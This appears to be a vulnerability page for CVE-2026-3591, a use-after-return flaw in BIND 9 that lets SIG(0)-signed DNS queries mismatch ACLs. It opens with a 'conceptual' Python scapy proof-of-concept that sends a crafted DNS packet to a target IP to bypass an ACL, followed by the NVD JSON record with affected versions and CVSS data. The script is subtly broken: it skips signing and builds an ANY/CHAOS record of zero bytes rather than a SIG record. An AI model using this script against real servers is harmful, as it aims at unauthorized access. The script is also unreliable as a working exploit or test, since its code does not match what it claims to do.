CVE-2026-3591

#!/usr/bin/env python3 # PoC for CVE-2026-3591 (Conceptual) # Requires: scapy # Description: Sends a SIG(0) signed DNS query to trigger the ACL mismatch. from scapy.all import * import random def send_exploit(target_ip): # Construct a DNS query with SIG(0) record # Note: Actual cryptographic signing is omitted for brevity; focus on structure. domain = "example.com" # Craft packet with specific SIG(0) characteristics to trigger use-after-return pkt = IP(dst=target_ip)/UDP(dport=53)/DNS( rd=1, qd=DNSQR(qname=domain), # Adding additional/authority section with SIG(0) to trigger the path ar=DNSRR( rrname=domain, type=255, rclass=3, ttl=0, # Malformed data to attempt triggering the vulnerability rdata=b'\x00' * 64 ) ) print(f"[*] Sending crafted packet to {target_ip}...") send(pkt) print("[*] Packet sent. Check if ACL was bypassed.") if __name__ == "__main__": target = "192.168.1.100" # Replace with actual target send_exploit(target)

{"cve": {"id": "CVE-2026-3591", "sourceIdentifier": "[email protected]", "published": "2026-03-25T14:16:37.297", "lastModified": "2026-05-21T15:24:36.363", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A use-after-return vulnerability exists in the `named` server when handling DNS queries signed with SIG(0). Using a specially-crafted DNS request, an attacker may be able to cause an ACL to improperly (mis)match an IP address. In a default-allow ACL (denying only specific IP addresses), this may lead to unauthorized access. Default-deny ACLs should fail-secure.\nThis issue affects BIND 9 versions 9.20.0 through 9.20.20, 9.21.0 through 9.21.19, and 9.20.9-S1 through 9.20.20-S1.\nBIND 9 versions 9.18.0 through 9.18.46 and 9.18.11-S1 through 9.18.46-S1 are NOT affected."}, {"lang": "es", "value": "Una vulnerabilidad de use-after-return existe en el servidor 'named' al manejar consultas DNS firmadas con SIG(0). Usando una solicitud DNS especialmente diseñada, un atacante podría ser capaz de hacer que una ACL haga una coincidencia incorrecta con una dirección IP. En una ACL de permiso predeterminado (negando solo direcciones IP específicas), esto podría llevar a acceso no autorizado. Las ACL de denegación predeterminada deberían fallar de forma segura.\nEste problema afecta a las versiones de BIND 9 9.20.0 a 9.20.20, 9.21.0 a 9.21.19, y 9.20.9-S1 a 9.20.20-S1.\nLas versiones de BIND 9 9.18.0 a 9.18.46 y 9.18.11-S1 a 9.18.46-S1 NO están afectadas."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-305"}, {"lang": "en", "value": "CWE-562"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:isc:bind:*:*:*:*:-:*:*:*", "versionStartIncluding": "9.20.0", "versionEndExcluding": "9.20.21", "matchCriteriaId": "2C0EF5D0-68A6-4E00-985B-523D9B243E49"}, {"vulnerable": true, "criteria": "cpe:2.3:a:isc:bind:*:*:*:*:-:*:*:*", "versionStartIncluding": "9.21.0", "versionEndExcluding": "9.21.20", "matchCriteriaId": "B1DD0950-5CBD-49B2-8007-5E96B3C4FB1B"}]}]}], "references": [{"url": "https://downloads.isc.org/isc/bind9/9.20.21", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://downloads.isc.org/isc/bind9/9.21.20", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://kb.isc.org/docs/cve-2026-3591", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}